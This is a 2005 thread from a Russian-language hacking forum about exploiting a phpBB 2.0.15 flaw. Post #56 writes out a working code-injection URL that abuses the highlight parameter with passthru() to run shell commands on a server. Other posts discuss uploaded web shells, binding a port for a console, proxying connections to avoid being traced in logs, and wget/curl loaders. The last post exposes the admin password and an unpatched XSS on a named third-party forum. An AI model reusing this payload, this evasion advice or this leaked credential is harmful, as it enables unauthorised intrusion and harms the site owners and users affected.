ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #51  
Старый 08.07.2005, 03:38
tester2005
Познающий
Регистрация: 17.01.2005
Сообщений: 48
Провел на форуме:
24128

Репутация: 15
По умолчанию

Цитата:
Сообщение от Azazel  
Такое дело. Шелл вроде я залил,......
Использую Putty чтоб подконектиться, а он мне Access Denied. Что ж может быть не так?
ГЫ: ага прям он те ща на тарелочке с добавкой =)
Что не так??...то шо ты залил, это веб-шелл а не шелл по ssh....
хошь консольный получить, то прибинди порт, и коннекться...а как дальше, то читай книжки =)

Последний раз редактировалось tester2005; 08.07.2005 в 03:40..
 

  #52  
Старый 08.07.2005, 04:31
ProTeuS
HARDstasy
Регистрация: 26.11.2004
Сообщений: 1,367
Провел на форуме:
4226592

Репутация: 2175


Отправить сообщение для ProTeuS с помощью ICQ
По умолчанию

Цитата:
Сообщение от tester2005  
ГЫ: ага прям он те ща на тарелочке с добавкой =)
Что не так??...то шо ты залил, это веб-шелл а не шелл по ssh....
хошь консольный получить, то прибинди порт, и коннекться...а как дальше, то читай книжки =)
кстати, если конектишся паттей по ssh без всяких там соксификаторов, то 4ей айпи будет в логах серванта, мой, или прокси, указанной в ослике??? Это так, 4тобы не спалиться лишний раз...
 

  #53  
Старый 08.07.2005, 04:57
bul666
Banned
Регистрация: 21.04.2005
Сообщений: 328
Провел на форуме:
632524

Репутация: 9
Отправить сообщение для bul666 с помощью ICQ
По умолчанию

Цитата:
Сообщение от WeKSTiK  
И у меня, всё работает на ура!!!
Покажи пример твоего запроса...

Всмысле че ты в командной строке писал
 

  #54  
Старый 08.07.2005, 08:47
tester2005
Познающий
Регистрация: 17.01.2005
Сообщений: 48
Провел на форуме:
24128

Репутация: 15
По умолчанию

Цитата:
Сообщение от ProTeuS  
кстати, если конектишся паттей по ssh без всяких там соксификаторов, то 4ей айпи будет в логах серванта, мой, или прокси, указанной в ослике??? Это так, 4тобы не спалиться лишний раз...
Патти к ослу никак не относитса, так что взаимосвязки настроек прокситса настройками бровзера там нет, хотя не проверял...
Так что используй proxycap или proxifier которые туннелируют все твои исходяшие с машини коннекты...

и ваще это уже оффтоп, сдесь обсуждаетса эксплотация дыры в 2.0.15 а не добыча шелла на сервер
 

  #55  
Старый 08.07.2005, 11:59
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию

воришка что за команды ты там мутишь??чтобы с правами показывалось надо всего лишь так написать: ls -la
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 

  #56  
Старый 08.07.2005, 15:39
vorishka
Постоянный
Регистрация: 03.03.2005
Сообщений: 351
Провел на форуме:
1120282

Репутация: 112
По умолчанию

Цитата:
Сообщение от m0nzt3r  
воришка что за команды ты там мутишь??чтобы с правами показывалось надо всего лишь так написать: ls -la
viewtopic.php?t=7&highlight=%27.passthru($HTTP_GET _VARS[cmd]).%27&cmd=ls%20../../%20-la. Т.е. выходим на 2 каталога выше, и сморим права. Не отображается тока папки. Пишем ls%20../../%20;la, тоже.... ls%20../../%20;-la тоже...
Чё делать то может на какой сайтик дадите пример?
 

  #57  
Старый 09.07.2005, 00:11
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию

а ты попробуй просто ls -la написать )) может так получится?
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 

  #58  
Старый 16.07.2005, 05:30
JayTi
Новичок
Регистрация: 14.07.2005
Сообщений: 2
Провел на форуме:
544

Репутация: 0
Отправить сообщение для JayTi с помощью ICQ
По умолчанию

Просьба такая, зделайте кто-то маленький гуид по лодерам (wget, curl).Плиз и как узнать где они стоят или вообше стоят ли. Плиззз
 

  #59  
Старый 16.07.2005, 05:56
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415

Репутация: 1398


Отправить сообщение для SanyaX с помощью ICQ
По умолчанию

Они должны стоят. Та качалка(wget) или другая (curl)!
__________________
-=Ok let's Go=-
-=OpenVPN=-
 

  #60  
Старый 16.07.2005, 19:15
exbbxak
Новичок
Регистрация: 22.04.2005
Сообщений: 15
Провел на форуме:
9155

Репутация: 0
По умолчанию

не хочу зоздавать новую тему просто отпишусь тут

на этом форуме www.hpforum.ru админ просто ...... его пасс gegcde и действуют все дыры, ему 2 недели назад посылали письмо о том как их закрыть а он говорит что типа и слышать об этом не хочет!!! короче там xss досихпор висит моно посмотреть через оперу в теме http://www.hpforum.ru/viewtopic.php?t=2&start=300 под ником exbb
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ